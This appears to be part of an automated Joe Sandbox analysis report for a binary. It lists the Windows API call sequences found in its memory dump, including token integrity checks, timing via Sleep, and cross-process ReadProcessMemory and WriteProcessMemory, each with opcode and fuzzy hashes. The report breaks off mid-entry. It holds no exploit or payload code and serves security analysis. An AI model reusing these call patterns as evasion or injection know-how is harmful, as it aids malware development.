                                                                                                                                        • Instruction ID: fef273674e6d0bc1374a59ff5d62b38ad4cbf557cbf02ea975611403ce4e58b6
                                                                                                                                        • Opcode Fuzzy Hash: 8bf5390f2e4e3a1cfe1a0ef29dd873057c60f66df7394d53938bb85ea08aa7ae
                                                                                                                                        • Instruction Fuzzy Hash: 1F01F563A005063BD22066629D97FBB7F1CBE61398F048025FE0697741E760DE1182F4
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00575075
                                                                                                                                        • __beginthreadex.LIBCMT ref: 00575093
                                                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 005750A8
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 005750BE
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 005750C5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3824534824-0
                                                                                                                                        • Opcode ID: 3a227d461e0871f95e0535bbdcc388066c9f898a1f6b7fb2321f5d647cb6296f
                                                                                                                                        • Instruction ID: 0d559adba47ebb263c80a6b77cc9638d91edd853c75f858b4763d48a5abaeaeb
                                                                                                                                        • Opcode Fuzzy Hash: 3a227d461e0871f95e0535bbdcc388066c9f898a1f6b7fb2321f5d647cb6296f
                                                                                                                                        • Instruction Fuzzy Hash: 2411E576909758BBC7119BA8AC08ADB7FACBB56321F144257F818D3290E6B18D0897E0
                                                                                                                                        APIs
                                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00568E3C
                                                                                                                                        • GetLastError.KERNEL32(?,00568900,?,?,?), ref: 00568E46
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00568900,?,?,?), ref: 00568E55
                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00568900,?,?,?), ref: 00568E5C
                                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00568E73
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 842720411-0
                                                                                                                                        • Opcode ID: 6764b2f40e01c56886c00b1e46e8204bb904755989e07188c313fccc77230fe0
                                                                                                                                        • Instruction ID: a04a29d4288f8f7219c553c4fa6fc91ba8526b4ec9c1e5f2688d24ff29857676
                                                                                                                                        • Opcode Fuzzy Hash: 6764b2f40e01c56886c00b1e46e8204bb904755989e07188c313fccc77230fe0
                                                                                                                                        • Instruction Fuzzy Hash: 3E0181B0251204BFDB205FA5DC48DBB7FADFF9A354B100629F849C3260DB329C14DA60
                                                                                                                                        APIs
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0057581B
                                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00575829
                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00575831
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0057583B
                                                                                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00575877
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2833360925-0
                                                                                                                                        • Opcode ID: 8f7dbf67c52bd68034b168c311cf71d4eab958844da5227bdd5a81c15106354c
                                                                                                                                        • Instruction ID: ca8e10562e50acf95972500763604b9bf7ed1b9c13e0245552752a25dc8e2843
                                                                                                                                        • Opcode Fuzzy Hash: 8f7dbf67c52bd68034b168c311cf71d4eab958844da5227bdd5a81c15106354c
                                                                                                                                        • Instruction Fuzzy Hash: DB015731D11A19DBDF00AFE4EC48AEDBFB8BB19711F108956E405B2180EB709954EBA2
                                                                                                                                        APIs
                                                                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567C62,80070057,?,?,?,00568073), ref: 00567D45
                                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567C62,80070057,?,?), ref: 00567D60
                                                                                                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567C62,80070057,?,?), ref: 00567D6E
                                                                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567C62,80070057,?), ref: 00567D7E
                                                                                                                                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567C62,80070057,?,?), ref: 00567D8A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3897988419-0
                                                                                                                                        • Opcode ID: 66ef6ad8c44a90485f83ed4479aeb0aeb02e5d1e6eba9a373ffd4eed8f966b52
                                                                                                                                        • Instruction ID: d1c642ee8ac08349d29f9174f6da10e6511f8d30c277056c4707583f9b7a3a05
                                                                                                                                        • Opcode Fuzzy Hash: 66ef6ad8c44a90485f83ed4479aeb0aeb02e5d1e6eba9a373ffd4eed8f966b52
                                                                                                                                        • Instruction Fuzzy Hash: DC019A72611219ABCB108F24DC04BAA7FBDEF48756F104424F809D7210E735ED00ABA0
                                                                                                                                        APIs
                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00568CDE
                                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00568CE8
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00568CF7
                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00568CFE
                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00568D14
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 44706859-0
                                                                                                                                        • Opcode ID: bec77df6eb64e9c35d5f902bab8eb86ce807059dfb708786192fe44012cb64c0
                                                                                                                                        • Instruction ID: 71d6b6a62de33427f44d27fa994fe2d24f294a2aee9fa83bd27eba6a0248188c
                                                                                                                                        • Opcode Fuzzy Hash: bec77df6eb64e9c35d5f902bab8eb86ce807059dfb708786192fe44012cb64c0
                                                                                                                                        • Instruction Fuzzy Hash: E6F03C35210204AFEB210FA59C8DEB73BADFF5A754F504525FA4586190CB61EC45EB70
                                                                                                                                        APIs
                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00568D3F
                                                                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00568D49
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00568D58
                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00568D5F
                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00568D75
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 44706859-0
                                                                                                                                        • Opcode ID: c6dedf515ef54303003d01a2a16ac6c0fd926b8916ba2bdf06d3940146456945
                                                                                                                                        • Instruction ID: 6e0759d4b5755a6cc5607c5c8808821c779f594d82e1fb02c3925d82eb323524
                                                                                                                                        • Opcode Fuzzy Hash: c6dedf515ef54303003d01a2a16ac6c0fd926b8916ba2bdf06d3940146456945
                                                                                                                                        • Instruction Fuzzy Hash: 2CF06970210204AFEB110FA5AC88EB73BACFF5A758F440215F94483190CBA09904EA60
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0056CD90
                                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0056CDA7
                                                                                                                                        • MessageBeep.USER32(00000000), ref: 0056CDBF
                                                                                                                                        • KillTimer.USER32(?,0000040A), ref: 0056CDDB
                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 0056CDF5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3741023627-0
                                                                                                                                        • Opcode ID: e41943235cbe70344d3022e70664609c8fe04190c873e4d54bceaf02af5be3fc
                                                                                                                                        • Instruction ID: 543cbd76e5c7af99b8035d8fe05d9f0081b9d3d28d4df415bbf7df7fc86f3f92
                                                                                                                                        • Opcode Fuzzy Hash: e41943235cbe70344d3022e70664609c8fe04190c873e4d54bceaf02af5be3fc
                                                                                                                                        • Instruction Fuzzy Hash: 28016D30550748ABEB215F60DD8EBA67FB8FB11705F040669A5D2A20E1DBF0A9589A80
                                                                                                                                        APIs
                                                                                                                                        • EndPath.GDI32(?), ref: 0051179B
                                                                                                                                        • StrokeAndFillPath.GDI32(?,?,0054BBC9,00000000,?), ref: 005117B7
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 005117CA
                                                                                                                                        • DeleteObject.GDI32 ref: 005117DD
                                                                                                                                        • StrokePath.GDI32(?), ref: 005117F8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2625713937-0
                                                                                                                                        • Opcode ID: e740b78ec6b09140b86a4052d2afab11d6f31c6d1e594708ce4479c8a84c1be9
                                                                                                                                        • Instruction ID: c924c174c18ac2309b0be62a83483ae28d5e0099b8e0e65643b1dcc00dc17396
                                                                                                                                        • Opcode Fuzzy Hash: e740b78ec6b09140b86a4052d2afab11d6f31c6d1e594708ce4479c8a84c1be9
                                                                                                                                        • Instruction Fuzzy Hash: CAF0193000960DABEB215F25ED4C79D3FA4F725322F048256E529542F0E735499AFF18
                                                                                                                                        APIs
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 0057CA75
                                                                                                                                        • CoCreateInstance.OLE32(005A3D3C,00000000,00000001,005A3BAC,?), ref: 0057CA8D
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                        • CoUninitialize.OLE32 ref: 0057CCFA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                        • String ID: .lnk
                                                                                                                                        • API String ID: 2683427295-24824748
                                                                                                                                        • Opcode ID: 380e9a9cf51c408173af456b8b24c197db5c0fe3c739b4ed30d0cefa3fe74932
                                                                                                                                        • Instruction ID: 50513901d9f07feaba4414e59cee46a6d24d4f71852455546a4317a8d045257b
                                                                                                                                        • Opcode Fuzzy Hash: 380e9a9cf51c408173af456b8b24c197db5c0fe3c739b4ed30d0cefa3fe74932
                                                                                                                                        • Instruction Fuzzy Hash: AFA13CB1104206AFE300EF64D895EABBBE8FF95754F00491CF15597292EB70EE49CB92
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00530FE6: std::exception::exception.LIBCMT ref: 0053101C
                                                                                                                                          • Part of subcall function 00530FE6: __CxxThrowException@8.LIBCMT ref: 00531031
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                          • Part of subcall function 00521680: _memmove.LIBCMT ref: 005216DB
                                                                                                                                        • __swprintf.LIBCMT ref: 0051E598
                                                                                                                                        Strings
                                                                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0051E431
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                        • API String ID: 1943609520-557222456
                                                                                                                                        • Opcode ID: cff071b09dc7e6ef72903d46e34ed2d66e288b372c8b02b78313518794961721
                                                                                                                                        • Instruction ID: 9a0190ec709a744d876f9079d85e8b09ee50e670792ffb8c92726499759f3e70
                                                                                                                                        • Opcode Fuzzy Hash: cff071b09dc7e6ef72903d46e34ed2d66e288b372c8b02b78313518794961721
                                                                                                                                        • Instruction Fuzzy Hash: F09170715046529FD714EF24D8AAC6FBFA5FFD6300F40091DF846972A1EA20EE48CB96
                                                                                                                                        APIs
                                                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 005352CD
                                                                                                                                          • Part of subcall function 00540320: __87except.LIBCMT ref: 0054035B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorHandling__87except__start
                                                                                                                                        • String ID: pow
                                                                                                                                        • API String ID: 2905807303-2276729525
                                                                                                                                        • Opcode ID: c3a3e59eaace9d82e0dfe074c95bcf91dc51a01db8378ffabd81fff398958d4d
                                                                                                                                        • Instruction ID: d52bbd22d64735c12b602666bc935fe3f6ab2cd64078aca8f67387d0e32b58cf
                                                                                                                                        • Opcode Fuzzy Hash: c3a3e59eaace9d82e0dfe074c95bcf91dc51a01db8378ffabd81fff398958d4d
                                                                                                                                        • Instruction Fuzzy Hash: 6F516A35A09A0297CF117B14C9553BA7FA0BB40764F307D69F6C18A2E5FE348CC8AA42
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: #$+
                                                                                                                                        • API String ID: 0-2552117581
                                                                                                                                        • Opcode ID: 1c48d25ff6643b3081f2e0f26d2e0bd44c0c668136d1c71405f69a357f33f305
                                                                                                                                        • Instruction ID: fdb099d6a5dcc5edda17913ff1cd42e270c6b7b94d4fd4957c2e83d5c9c50fdc
                                                                                                                                        • Opcode Fuzzy Hash: 1c48d25ff6643b3081f2e0f26d2e0bd44c0c668136d1c71405f69a357f33f305
                                                                                                                                        • Instruction Fuzzy Hash: A351E075500256CFDF25EF68C894AFA7FA4FF66320F144055E892AB2D0D734AD82CBA0
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$_free
                                                                                                                                        • String ID: #VR
                                                                                                                                        • API String ID: 2620147621-2899241889
                                                                                                                                        • Opcode ID: 1ce7bf3d35307742a5da6c5af42e80f1e48a31795c1399479820cfdde06eb99c
                                                                                                                                        • Instruction ID: 64268e024ab84b0d07b89c77c292db44af0774d0d1c89233ba01e827cb692747
                                                                                                                                        • Opcode Fuzzy Hash: 1ce7bf3d35307742a5da6c5af42e80f1e48a31795c1399479820cfdde06eb99c
                                                                                                                                        • Instruction Fuzzy Hash: 615149716087428FEB24CF28C495B6FBBE1FF85314F14492DE98A87291E731E885CB52
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$_memmove
                                                                                                                                        • String ID: ERCP
                                                                                                                                        • API String ID: 2532777613-1384759551
                                                                                                                                        • Opcode ID: a575c1835de0d02c6d7d6e04905b3f63be0fee8154c53a90bbbbbbabe1448c2e
                                                                                                                                        • Instruction ID: ab2ec382ee7b265e8f49d1ed1deb63b30ad548f6adb9576e2b80b56a998820bf
                                                                                                                                        • Opcode Fuzzy Hash: a575c1835de0d02c6d7d6e04905b3f63be0fee8154c53a90bbbbbbabe1448c2e
                                                                                                                                        • Instruction Fuzzy Hash: 1D51E1B190071A9FDB24CF65D888BAABFF4FF45310F24856EE94ACB291E7309581CB50
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00571CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00569E4E,?,?,00000034,00000800,?,00000034), ref: 00571CE5
                                                                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0056A3F7
                                                                                                                                          • Part of subcall function 00571C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00569E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00571CB0
                                                                                                                                          • Part of subcall function 00571BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00571C08
                                                                                                                                          • Part of subcall function 00571BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00569E12,00000034,?,?,00001004,00000000,00000000), ref: 00571C18
